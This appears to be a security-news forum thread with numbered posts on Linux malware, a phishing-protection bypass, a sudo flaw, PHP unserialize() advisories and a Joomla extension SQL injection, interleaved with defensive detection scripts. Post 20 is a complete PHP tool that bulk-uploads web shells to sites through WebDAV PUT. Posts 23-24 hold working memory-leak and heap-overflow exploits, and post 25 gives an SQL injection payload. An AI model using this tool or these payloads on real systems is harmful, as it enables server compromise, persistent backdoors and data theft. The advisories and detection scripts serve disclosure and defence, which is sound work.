  17. Several thousand computers running the Linux and FreeBSD operating systems have been infected over the past seven months with sophisticated malware that surreptitiously makes them part of a renegade network blasting the Internet with spam, researchers said Wednesday. The malware likely infected many more machines during the five years it's known to have existed. Most of the machines infected by the so-called Mumblehard malware are believed to run websites, according to the 23-page report issued by researchers from antivirus provider Eset. During the seven months that they monitored one of its command and control channels, 8,867 unique IP addresses connected to it, with 3,000 of them joining in the past three weeks. The discovery is reminiscent of Windigo, a separate spam botnet made up of 10,000 Linux servers that Eset discovered 14 months ago. The Mumblehard malware is the brainchild of experienced and highly skilled programmers. It includes a backdoor and a spam daemon, which is a behind-the-scenes process that sends large batches of junk mail. These two main components are written in Perl and they're obfuscated inside a custom "packer" that's written in assembly, a low-level programming language that closely corresponds to the native machine code of the computer hardware it runs on. Some of the Perl script contains a separate executable with the same assembly-based packer that's arranged in the fashion of a Russian nesting doll. The result is a very stealthy infection that causes production servers to send spam and may serve other nefarious purposes. More and more complex "Malware targeting Linux and BSD servers is becoming more and more complex," researchers from Eset wrote. "The fact that the authors used a custom packer to hide the Perl source code is somewhat sophisticated. However, it is definitely not as complex as the Windigo Operation we documented in 2014. 
Nonetheless, it is worrying that the Mumblehard operators have been active for many years without disruption." The researchers uncovered evidence that Mumblehard may have links to Yellsoft, a company that sells DirecMailer, which is Perl-based software for sending bulk e-mail. The block of IP addresses for both Yellsoft and some of the Mumblehard C&C servers share the same range. What's more, pirated copies of DirecMailer silently install the Mumblehard backdoor. The pirated copies are also obfuscated by the same packer used by Mumblehard's malicious components. Eset researchers discovered Mumblehard after being contacted by a system administrator who sought assistance for a server that was added to public security blacklists for sending spam. The researchers identified and analyzed a process that was causing the server to connect to different SMTP servers and send spam. The researchers then linked the behavior to an executable file located in the server's /tmp directory. A version of the Mumblehard spam component was uploaded to the VirusTotal online malware checking service in 2009, an indication that the spammer program has existed for more than five years. The researchers were able to monitor the botnet by registering one of the domain names that Mumblehard-infected machines query every 15 minutes. The Eset researchers still aren't certain how Mumblehard is installed. Based on their analysis of the infected server, they suspect the malware may take hold by exploiting vulnerabilities in the Joomla and WordPress content management systems. Their other theory is that the infections are the result of installing pirated versions of the DirecMailer program. The almost 9,000 IP addresses Eset observed can't be directly correlated to the number of machines that were infected by Mumblehard, since in some cases more than one server may share an address and in other cases a single server may give up an old address and take up a new one. 
Still, the number is a strong indication that several thousand machines were affected during the seven months Eset monitored the malware. Administrators who want to check their servers for Mumblehard infections should look for unexplained daemons. These so-called cronjobs added by the malware activate the backdoor and cause it to query C&C servers four times per hour in precise, 15-minute increments. The backdoor is usually located in the /tmp or /var/tmp folders. The backdoor can be deactivated by mounting the directories with the noexec option. Source
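The two concrete checks in the report (a cron entry firing every 15 minutes from /tmp or /var/tmp, and noexec on those mounts) can be scripted. As an added example that is not part of the Ars Technica piece or Eset's report, here is a Python hunt over crontab and /proc/mounts lines; the sample lines are constructed, and the file names in them are placeholders rather than indicators from the report.

```python
"""Hunt for Mumblehard-style persistence in crontabs and check temp-dir mount options.

Added example, not from the report above: the backdoor is activated by a cron
entry firing every 15 minutes from /tmp or /var/tmp, and noexec on those
mounts neutralises it. The crontab and /proc/mounts lines below are
constructed sample input with placeholder paths.
"""
import re
from typing import Dict, List, Set, Tuple

TEMP_DIRS = ("/tmp/", "/var/tmp/")
CRON_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")


def expand_minutes(field: str) -> Set[int]:
    """Expand a crontab minute field ('*/15', '0,15,30,45', '5-10', '7') to a set of minutes."""
    minutes: Set[int] = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_s = part.split("/", 1)
            step = int(step_s)
        if part == "*":
            lo, hi = 0, 59
        elif "-" in part:
            lo, hi = (int(x) for x in part.split("-", 1))
        else:
            lo = hi = int(part)
        minutes.update(range(lo, hi + 1, step))
    return minutes


def is_quarter_hourly(minute_field: str, hour_field: str) -> bool:
    """True for a job that fires four times an hour at exact 15-minute spacing."""
    if hour_field != "*":
        return False
    m = sorted(expand_minutes(minute_field))
    return len(m) == 4 and all(b - a == 15 for a, b in zip(m, m[1:]))


def suspicious_cron_entries(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (severity, command) for crontab lines matching the Mumblehard pattern."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):              # @reboot, @hourly ...: only the temp-dir check applies
            command = line.split(None, 1)[1] if " " in line else ""
            quarter = False
        else:
            match = CRON_RE.match(line)
            if not match:                     # MAILTO=... and other variable assignments
                continue
            minute, hour, _dom, _mon, _dow, command = match.groups()
            try:
                quarter = is_quarter_hourly(minute, hour)
            except ValueError:                # unparseable minute field
                quarter = False
        in_temp = any(d in command for d in TEMP_DIRS)
        if in_temp and quarter:
            findings.append(("HIGH", command))    # every 15 minutes, run from a temp dir
        elif in_temp:
            findings.append(("MEDIUM", command))  # anything executed from a temp dir
    return findings


def temp_dirs_noexec(mounts: List[str]) -> Dict[str, bool]:
    """Map each temp mount point found in /proc/mounts-format lines to whether it has noexec."""
    status = {}
    for line in mounts:
        parts = line.split()
        if len(parts) < 4:
            continue
        mountpoint, options = parts[1], parts[3].split(",")
        if mountpoint in ("/tmp", "/var/tmp"):
            status[mountpoint] = "noexec" in options
    return status


# Constructed sample input: two quarter-hourly temp-dir jobs, two other temp-dir jobs.
SAMPLE_CRONTAB = """\
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/collect-metrics
*/15 * * * * /var/tmp/.cache/updater >/dev/null 2>&1
3,18,33,48 * * * * /tmp/.x/run >/dev/null 2>&1
30 2 * * 0 /tmp/cleanup.sh
@reboot /tmp/agent start
""".splitlines()

SAMPLE_MOUNTS = [
    "tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0",
    "/dev/sda1 / ext4 rw,relatime 0 0",
]

if __name__ == "__main__":
    for severity, command in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(severity, command)
    print(temp_dirs_noexec(SAMPLE_MOUNTS))
```

A mount point missing from the result (here /var/tmp) is not on its own filesystem and inherits the options of its parent, so it is not covered by noexec unless the parent is; on a real host, feed in the per-user crontabs under /var/spool/cron as well as /etc/crontab and /etc/cron.d.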
  18. Google has been obliged to revise its Password Alert anti-phishing protection just hours after releasing it when security researchers showed how the technology was easily circumvented. Security consultant Paul Moore (@Paul_Reviews) has published a proof-of-concept JavaScript exploit that skirted the defensive technology with just seven lines of code. The Password Alert for Chrome browser plug-in is meant to trigger alerts for users in cases when they are induced to hand over their password to counterfeit sites impersonating Google (other online services aren't covered). The extension only kicks into action after users have signed into their Google account; thereafter it puts up warnings to reset Gmail passwords in cases where users are taken in by a phish. The problem is these alerts can be shut down with minimum effort and a few lines of JavaScript planted on counterfeit sites. More specifically, Moore's script looks for a warning banner every five milliseconds before removing anything it detects. Other approaches aimed at preventing humans actually seeing a warning – effectively killing off alerts as soon as they are generated – might also have been possible. Moore posted a short video on YouTube to highlight his concerns.

Bypassing Google's Password Alert "Protection"

Chris Boyd, a malware intelligence analyst at security software firm Malwarebytes, backed up worries about how easily Password Alert might be bypassed in a blog post that explains the issue in greater depth here. To its credit, Google responded promptly to the issue, updating its technology hours after El Reg flagged up the problem and requested a comment. "[The] issue is now fixed and the current version of Password Alert includes the patch," a spokesman told El Reg by email on Friday morning. Google's anti-phishing tech was only released on Wednesday so early teething troubles are arguably to be expected. 
Relying on Password Alert is, in any case, maybe not enough and users should consider turning on two-step authentication and/or using a full fat password manager such as LastPass to protect them from phishing attacks. Google researchers and a team from University of California, San Diego recently warned (PDF) that the most effective phishing attacks can succeed 45 per cent of the time. Source
  19. Ubuntu's latest edition contains a local access escalation flaw first reported a year ago that allows users to tinker with the system clock to become a root user. The attack, reported by Linux lover Mark Smith, isn't colossally risky as it impacts only local users; those with existing access to a machine. Smith has chided Ubuntu for 'falling behind Debian'. "Congratulations, Ubuntu team. You have now fallen behind Debian's Stable Release in a security update to sudo, despite several releases in between," Smith says on an Ubuntu mailing list. "This has been fixed, fully fixed, for over a year now. Epic fail." But Canonical engineer Tyler Hicks says the bug, which allows users to access the clock without authentication, is low severity and will be fixed when version 15 is released later this year. "We will fix this issue in the next Ubuntu release (15.10) by including sudo 1.8.10 or newer," Hicks says in a "Due to the issue's low severity and considering our practice of prioritising resources on publishing security updates that fix issues of greater security impact, we may fix this issue in stable releases of Ubuntu in the future if another sudo vulnerability of higher severity is found or if new details emerge regarding this issue." Hicks says the flaw likely does not permit privilege escalation for remote attackers. "I don't see a way for an attacker, without physical access, to use an arbitrary code execution vulnerability in combination with the issue that you've described in this bug to elevate his/her privileges," he says. Admins would instead need to gift attackers with an unlocked desktop. Smith says attackers could guess the required parameters with about five minutes of brute forcing on a relatively slow machine. ® Source
  20.
```
<?php /* Author: @AdeRoot\n\n"; echo " // WebDav Exploit\n\n";
if($argc == 1) {
    echo "Help parameter: | -h--help\n";
    exit(1);
}

function help() {
    echo "Options[+]:\n\n";
    echo "Dominio: | -d--dominio\n";
    echo "Lista: | -l--lista\n";
    echo "Thread: | -t--thread\n";
    echo "File: | -f--file\n";
    echo "Create: | -c--create\n\n";
    echo "Single:\n\n";
    echo "Usage: php webdav.php -d xxx -f xxx -c xxx\n";
    echo "Example: php webdav.php -d www.example.com -f /path/shell.asp -c shell.asp\n\n";
    echo "Lista:\n\n";
    echo "Usage: php webdav.php -l xxx -t xxx -f xxx -c xxx\n";
    echo "Example: php webdav.php -l lista.txt -t 10 -f /path/shell.asp -c shell.asp\n\n";
}

error_reporting(0);
set_time_limit(0);

$opts = getopt("hd:f:l:t:c:");
foreach(array_keys($opts) as $opt) switch($opt) {
    case "h":
        help();
        break;
    case "d":
        $site = $opts["d"];
        $file = $opts["f"];
        $create = $opts["c"];
        post($site);
        break;
    case "l":
        $site = array_filter(explode("\n",file_get_contents($opts["l"])));
        $thread = $opts["t"];
        $file = $opts["f"];
        $create = $opts["c"];
        thread($site,$thread,$file,$create);
        break;
}

function thread($site,$thread,$file,$create) {
    $out = 0;
    $thr = $thread;
    $ini = 0;
    $fin = $thr - 1;
    while(1){
        $childs = array();
        for ($count = $ini; $count <= $fin; $count++){
            if(empty($site[$count])){
                $out = 1;
                continue;
            }
            $pid = pcntl_fork();
            if ( $pid == -1 ) {
                echo "Fork error\n";
                exit(1);
            } else if ($pid) {
                array_push($childs, $pid);
            } else {
                post($site[$count]);
                exit(0);
            }
        }
        foreach($childs as $key => $pid){
            pcntl_waitpid($pid, $status);
        }
        if($out == 1){
            exit(0);
        }
        $ini = $fin + 1;
        $fin = $fin + $thr;
    }
}

function post($site) {
    global $file, $create;
    $filesize = filesize($file);
    $fp = fopen($file, "r");
    if(preg_match("@http://@", $site)) {
        $site = $site;
    } else {
        $site = "http://".$site;
    }
    $site = $site."/".$create;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $site);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0");
    curl_setopt($ch, CURLOPT_PUT, true);
    curl_setopt($ch, CURLOPT_INFILE, $fp);
    curl_setopt($ch, CURLOPT_INFILESIZE, $filesize);
    $exec = curl_exec($ch);
    echo $site."=>";
    $result = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    fclose($fp);
    if($result == 200 || $result == 201) {
        echo "Created Successfully\n\n";
        file_put_contents("wbshells.txt", $site."\n", FILE_APPEND);
    } else {
        echo "Failed\n\n";
    }
}

if(isset($opts["f"]) and ($opts["c"])) {
    echo "End!\n\n";
} else if (!isset($opts["h"])){
    echo "Option invalid or missing set more options\n\n";
}
?>
```
Source
  21. DAWIN Distributed Audit & Wireless Intrusion Notification DA-WIN is the end of the manual PCI wireless scan. DA-WIN provides an organisation a continuous wireless scanning capability that is light touch and simple. It utilises compact and discreet sensors that can easily be deployed, reducing the total cost of protection and simplifying the effort required for absolute, categoric regulatory compliance. Link: Fat-Loud-Blokes-World-Of-Wierd
  22. 0d1n is a web security tool for fuzzing various HTTP payloads. It's written in C and uses libcurl. Download
  23. # Type Confusion Infoleak Vulnerability in unserialize() with SoapFault

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1 - Release Date: 2015.4.28

> A type confusion vulnerability was discovered in unserialize() with SoapFault object's __toString() magic method that can be abused for leaking arbitrary memory blocks.

Affected Versions
------------

Affected is PHP 5.6 < 5.6.8
Affected is PHP 5.5 < 5.5.24
Affected is PHP 5.4 < 5.4.40
Affected is PHP 5.3 <= 5.3.29

Credits
------------

This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
PHP_METHOD(SoapFault, __toString)
{
	...
	faultcode = zend_read_property(soap_fault_class_entry, this_ptr, "faultcode", sizeof("faultcode")-1, 1 TSRMLS_CC);
	faultstring = zend_read_property(soap_fault_class_entry, this_ptr, "faultstring", sizeof("faultstring")-1, 1 TSRMLS_CC);
	file = zend_read_property(soap_fault_class_entry, this_ptr, "file", sizeof("file")-1, 1 TSRMLS_CC);
	line = zend_read_property(soap_fault_class_entry, this_ptr, "line", sizeof("line")-1, 1 TSRMLS_CC);
	...
	len = spprintf(&str, 0, "SoapFault exception: [%s] %s in %s:%ld\nStack trace:\n%s",
	               Z_STRVAL_P(faultcode), Z_STRVAL_P(faultstring), Z_STRVAL_P(file), Z_LVAL_P(line),
	               Z_STRLEN_P(trace) ? Z_STRVAL_P(trace) : "#0 {main}\n");
	zval_ptr_dtor(&trace);
	RETURN_STRINGL(str, len, 0);
}
```

The Z_STRVAL_P macro leads to looking up an arbitrary valid memory address and returning, via an integer-type zval, a string that starts from this memory address. If the memory address is an invalid memory position, it should result in a crash. The Z_LVAL_P macro leads to leaking the memory address at which a string-type zval's string value is stored.

Proof of Concept Exploit
------------

The PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.

```
<?php
$data = 'O:9:"SoapFault":4:{s:9:"faultcode";i:4298448493;s:11:"faultstring";i:4298448543;s:7:"'."\0*\0".'file";i:4298447319;s:7:"'."\0*\0".'line";s:4:"ryat";}';
echo unserialize($data);
?>
```

Test the PoC on the command line, then output some memory blocks and memory address:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run test.php
SoapFault exception: [UH??AWAVSPI??I??H???? in UH??AWAVAUATSH???:4307253992
] UH??SPD???*?????t"H?
Stack trace:
#0 test.php(4): unserialize('O:9:"SoapFault"...')
#1 {main}
Process 889 exited with status = 0 (0x00000000)
```

Source
  24. # Type Confusion Infoleak and Heap Overflow Vulnerability in unserialize() with exception

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.3 - Release Date: 2015.4.28

> A type confusion vulnerability was discovered in exception object's __toString()/getTraceAsString() method that can be abused for leaking arbitrary memory blocks or heap overflow.

Affected Versions
------------

Affected is PHP 5.6 < 5.6.8
Affected is PHP 5.5 < 5.5.24
Affected is PHP 5.4 < 5.4.40

Credits
------------

This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
ZEND_METHOD(exception, getTraceAsString)
{
	zval *trace;
	char *res, **str, *s_tmp;
	int res_len = 0, *len = &res_len, num = 0;

	DEFAULT_0_PARAMS;

	res = estrdup("");
	str = &res;

	trace = zend_read_property(default_exception_ce, getThis(), "trace", sizeof("trace")-1, 1 TSRMLS_CC);
	zend_hash_apply_with_arguments(Z_ARRVAL_P(trace) TSRMLS_CC, (apply_func_args_t)_build_trace_string, 3, str, len, &num);
	...

static int _build_trace_string(zval **frame TSRMLS_DC, int num_args, va_list args, zend_hash_key *hash_key) /* {{{ */
{
	char *s_tmp, **str;
	int *len, *num;
	long line;
	HashTable *ht = Z_ARRVAL_PP(frame);
	zval **file, **tmp;
	...
	TRACE_APPEND_KEY("class");
	TRACE_APPEND_KEY("type");
	TRACE_APPEND_KEY("function");
	...

#define TRACE_APPEND_KEY(key) \
	if (zend_hash_find(ht, key, sizeof(key), (void**)&tmp) == SUCCESS) { \
		if (Z_TYPE_PP(tmp) != IS_STRING) { \
			zend_error(E_WARNING, "Value for %s is no string", key); \
			TRACE_APPEND_STR("[unknown]"); \
		} else { \
			TRACE_APPEND_STRL(Z_STRVAL_PP(tmp), Z_STRLEN_PP(tmp)); \
		} \
	}
```

The Z_ARRVAL_P macro leads to pointing a fake ZVAL in memory via a fake HashTable and a fake Bucket. So we can supply a fake string-type ZVAL, and look up an arbitrary memory address via the Z_STRVAL_PP macro, causing a crash or an information leak.

```
#define TRACE_APPEND_STRL(val, vallen) \
	{ \
		int l = vallen; \
		*str = (char*)erealloc(*str, *len + l + 1); \
		memcpy((*str) + *len, val, l); \
		*len += l; \
	}
```

Signed integer arithmetic is used in erealloc(). The memcpy() function's third parameter is an unsigned integer. The vallen can be completely controlled and we can supply a negative value via a fake string-type ZVAL. So we can assign a value to val which is larger than the real allocated memory. The memcpy() will then copy more data than the heap-based buffers can hold, causing a heap-based buffer overflow.

Proof of Concept Exploit
------------

The PoC works on standard MacOSX 10.10.3 installation of PHP 5.5.20.

```
<?php
ini_set("memory_limit", -1);
setup_memory();
$x = unserialize('O:9:"exception":1:{s:16:"'."\0".'Exception'."\0".'trace";s:'.strlen($hashtable).':"'.$hashtable.'";}');
echo $x, "\n";

function setup_memory() {
	global $str, $hashtable;
	$base = 0x114000000 + 0x20;
	$bucket_addr = $base;
	$zval_delta = 0x100;
	$hashtable_delta = 0x200;
	$zval_addr = $base + $zval_delta;
	$hashtable_addr = $base + $hashtable_delta;
	$bucket = "\x01\x00\x00\x00\x00\x00\x00\x00";
	$bucket .= "\x00\x00\x00\x00\x00\x00\x00\x00";
	$bucket .= ptr2str($bucket_addr + 3*8);
	$bucket .= ptr2str($zval_addr);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(zhash('class'));
	$bucket .= "\x06\x00\x00\x00\x00\x00\x00\x00";
	$bucket .= ptr2str($bucket_addr + 3*8 + 9*8);
	$bucket .= ptr2str($zval_addr + 5*8 + 6);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str(0);
	$bucket .= ptr2str($zval_addr + 2*5*8 + 2*6);
	$bucket .= ptr2str($bucket_addr);
	$bucket .= ptr2str($bucket_addr + 9*8);
	$hashtable = "\x00\x00\x00\x00";
	$hashtable .= "\x01\x00\x00\x00";
	$hashtable .= "\x03\x00\x00\x00";
	$hashtable .= "\x00\x00\x00\x00";
	$hashtable .= "\x00\x00\x00\x00\x00\x00\x00\x00";
	$hashtable .= ptr2str(0);
	$hashtable .= ptr2str($bucket_addr);
	$hashtable .= ptr2str($bucket_addr + 9*8);
	$hashtable .= ptr2str($bucket_addr + 18*8);
	$hashtable .= ptr2str(0);
	$hashtable .= "\x00";
	$hashtable .= "\x00";
	$zval = ptr2str($hashtable_addr);
	$zval .= ptr2str(0);
	$zval .= "\x00\x00\x00\x00";
	$zval .= "\x04";
	$zval .= "\x00";
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
	$zval .= ptr2str(0x100352572);
	$zval .= ptr2str(0x16);
	$zval .= "\x00\x00\x00\x00";
	$zval .= "\x06";
	$zval .= "\x00";
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
	$zval .= ptr2str(0);
	$zval .= ptr2str(hexdec(bin2hex(strrev('class'))));
	$part = str_repeat("\x73", 4096);
	for ($j = 0; $j < strlen($bucket); $j++) {
		$part[$j] = $bucket[$j];
	}
	for ($j = 0; $j < strlen($hashtable); $j++) {
		$part[$j + $hashtable_delta] = $hashtable[$j];
	}
	for ($j = 0; $j < strlen($zval); $j++) {
		$part[$j + $zval_delta] = $zval[$j];
	}
	$str = str_repeat($part, 1024*1024*256/4096);
}

function ptr2str($ptr) {
	$out = "";
	for ($i=0; $i<8; $i++) {
		$out .= chr($ptr & 0xff);
		$ptr >>= 8;
	}
	return $out;
}

function zhash($key) {
	$hash = 5381;
	$key = $key;
	$len = strlen($key) + 1;
	for (; $len >= 8; $len -= 8) {
		for ($i = 0; $i < 8; $i++) {
			$hash = (($hash << 5) + $hash) + ord($key{$i});
		}
	}
	$key = substr($key, -$len);
	for ($i = 0; $i < $len; $i++) {
		$hash = (($hash << 5) + $hash) + ord($key{$i});
	}
	return $hash;
}
?>
```

Test the PoC on the command line, then output some memory blocks:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run tcpoc.php
Process 1825 launched: '/usr/bin/php' (x86_64)
exception 'Exception' in tcpoc.php:7
Stack trace:
#0 [internal function]: UH??AWAVSPI??I??H????()
#1 {main}
Process 1825 exited with status = 0 (0x00000000)
```

Source
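Both advisories (posts 23 and 24) come down to the same shape: attacker-controlled serialized data hands a built-in class a property of the wrong type (an integer where SoapFault::__toString() expects a string, a string where the exception trace code expects an array), and unserialize() builds the object anyway. An application that must accept serialized input can refuse such payloads before unserialize() runs. Below is an added example, written for this page and not taken from either advisory, of a parser for the PHP serialization format that lists every object in a payload with the type of each property and compares them to an expected-type table. The EXPECTED table is my reading of the two code excerpts above, and the three sample payloads are constructed for the example.

```python
"""Inspect PHP serialize() data for object payloads before unserialize() sees it.

Added example, not from the advisories above: a recursive-descent parser for
the PHP serialization format that records every O: object and the PHP type of
each property, so a SoapFault with an integer "faultcode" or an exception with
a string "trace" can be rejected up front. EXPECTED is assumed from the code
excerpts in the advisories; the sample payloads are constructed.
"""
from typing import Any, Dict, List

PHP_TYPE = {"bytes": "string", "int": "int", "float": "float", "bool": "bool",
            "NoneType": "null", "dict": "array", "PhpObject": "object"}

# Property types the vulnerable methods assume (assumption drawn from the excerpts above).
EXPECTED = {
    "soapfault": {"faultcode": "string", "faultstring": "string", "file": "string", "line": "int"},
    "exception": {"trace": "array"},
}


class PhpObject:
    def __init__(self, cls: str, props: Dict[str, Any]):
        self.cls, self.props = cls, props


class PhpSerialized:
    """Parser for the output of PHP's serialize(); supports N, b, i, d, s, a and O."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0
        self.objects: List[PhpObject] = []    # every O: value seen, in parse order

    def parse(self) -> Any:
        value = self._value()
        if self.pos != len(self.data):
            raise ValueError("trailing bytes after the serialized value")
        return value

    def _expect(self, ch: bytes) -> None:
        if self.data[self.pos:self.pos + 1] != ch:
            raise ValueError(f"expected {ch!r} at offset {self.pos}")
        self.pos += 1

    def _until(self, ch: bytes) -> bytes:
        end = self.data.index(ch, self.pos)
        out = self.data[self.pos:end]
        self.pos = end + 1
        return out

    def _quoted(self, length: int) -> bytes:
        """Read exactly `length` bytes between quotes; strings may contain NUL or quotes."""
        self._expect(b'"')
        out = self.data[self.pos:self.pos + length]
        if len(out) != length:
            raise ValueError("truncated string")
        self.pos += length
        self._expect(b'"')
        return out

    def _value(self) -> Any:
        tag = self.data[self.pos:self.pos + 1]
        self.pos += 1
        if tag == b"N":
            self._expect(b";")
            return None
        self._expect(b":")
        if tag == b"b":
            return self._until(b";") == b"1"
        if tag == b"i":
            return int(self._until(b";"))
        if tag == b"d":
            return float(self._until(b";"))
        if tag == b"s":
            out = self._quoted(int(self._until(b":")))
            self._expect(b";")
            return out
        if tag == b"a":
            count = int(self._until(b":"))
            self._expect(b"{")
            arr = {}
            for _ in range(count):
                key = self._value()
                arr[key] = self._value()
            self._expect(b"}")
            return arr
        if tag == b"O":
            cls = self._quoted(int(self._until(b":"))).decode()
            self._expect(b":")
            count = int(self._until(b":"))
            self._expect(b"{")
            props: Dict[str, Any] = {}
            for _ in range(count):
                key = self._value()
                if not isinstance(key, bytes):
                    raise ValueError("property names must be strings")
                # protected "\0*\0name" and private "\0Class\0name" keep only the bare name
                props[key.split(b"\0")[-1].decode()] = self._value()
            self._expect(b"}")
            obj = PhpObject(cls, props)
            self.objects.append(obj)
            return obj
        raise ValueError(f"unsupported type tag {tag!r} at offset {self.pos - 2}")


def audit(payload: bytes) -> List[str]:
    """Parse a payload and report every object plus any property of the wrong type."""
    parser = PhpSerialized(payload)
    parser.parse()
    findings = []
    for obj in parser.objects:
        findings.append(f"object of class {obj.cls}")
        for name, value in obj.props.items():
            actual = PHP_TYPE.get(type(value).__name__, "unknown")
            want = EXPECTED.get(obj.cls.lower(), {}).get(name)   # PHP class names are case-insensitive
            if want and want != actual:
                findings.append(f"{obj.cls}.{name} is {actual}, expected {want}")
    return findings


# Constructed samples: a harmless array, then two payloads shaped like the advisories' PoCs.
SAMPLE_OK = b'a:2:{i:0;s:3:"abc";s:3:"key";b:1;}'
SAMPLE_SOAPFAULT = b'O:9:"SoapFault":2:{s:9:"faultcode";i:1;s:7:"\x00*\x00line";s:2:"42";}'
SAMPLE_EXCEPTION = b'O:9:"exception":1:{s:16:"\x00Exception\x00trace";s:4:"AAAA";}'

if __name__ == "__main__":
    for sample in (SAMPLE_OK, SAMPLE_SOAPFAULT, SAMPLE_EXCEPTION):
        print(audit(sample) or ["no objects"])
```

The simplest policy built on this is to reject any payload for which audit() returns anything at all: data that legitimately needs objects should be carried in a format such as JSON, and a parse error (ValueError) should be treated as a rejection too.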
  25. OS Solution OSProperty 2.8.0 was vulnerable to an unauthenticated SQL injection in the country_id parameter of the request made to retrieve a list of states for a given country. The version was not bumped when the vulnerability was fixed, but if you downloaded it after April 27th, you downloaded a fixed version.

http://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/os-property
http://joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html

Example URL: http://172.31.16.51/index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31

Parameter: country_id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31' UNION ALL SELECT NULL,CONCAT(0x716a627171,0x797774584a4b4954714d,0x7162717071)#

-- http://volatile-minds.blogspot.com -- blog
-- http://www.volatileminds.net -- website

Source
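Because country_id is an integer that the extension passed to its query unvalidated, the cheapest way to find attempts against this endpoint in retrospect is to scan the web server's access log for integer parameters that arrived as anything else. As an added example (not from the advisory or from the OSProperty project), here is a Python scanner over combined-format access log lines; the lines, the client addresses and the probe value are constructed, and the INTEGER_PARAMS set is an assumption about which parameters of this endpoint are numeric.

```python
"""Spot SQL injection attempts against integer parameters in web-server access logs.

Added example, not from the advisory above: the OSProperty bug is an unquoted
integer parameter (country_id) reaching a query, so detection asks "did a
parameter that must be an integer arrive as something else?". The log lines
below are constructed; addresses and the probe are placeholders.
"""
import re
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+)')
INTEGER_PARAMS = {"country_id", "state_id", "id", "Itemid"}   # assumed integer-only parameters
SQL_MARKERS = re.compile(r"\bunion\b|\bselect\b|\bconcat\s*\(|'|--|#|0x[0-9a-f]{4,}", re.I)


def inspect_query(path: str) -> List[str]:
    """Return findings for one request target; parse_qs undoes the percent-encoding."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    findings = []
    for name, values in query.items():
        for value in values:
            if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
                findings.append(f"{name}: expected integer, got {value!r}")
            if SQL_MARKERS.search(value):
                findings.append(f"{name}: SQL markers in {value!r}")
    return findings


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (client ip, path, findings) for every request that raised a finding."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        findings = inspect_query(match["path"])
        if findings:
            hits.append((match["ip"], match["path"], findings))
    return hits


# Constructed sample: a normal state lookup, an injection probe, and an unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Apr/2015:10:15:01 +0000] "GET /index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [27/Apr/2015:10:15:07 +0000] "GET /index.php?option=com_osproperty&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=31%27%20UNION%20ALL%20SELECT%20NULL,NULL%23 HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Apr/2015:10:16:00 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, findings in scan_access_log(SAMPLE_LOG):
        print(ip, path)
        for finding in findings:
            print("  ", finding)
```

The integer check is the reliable one; the marker regex is there to catch probes against parameters not in the list and will need tuning per site. The durable fix on the application side is the same rule applied before the query runs: cast country_id to an integer (or bind it as one) rather than interpolating the raw request value.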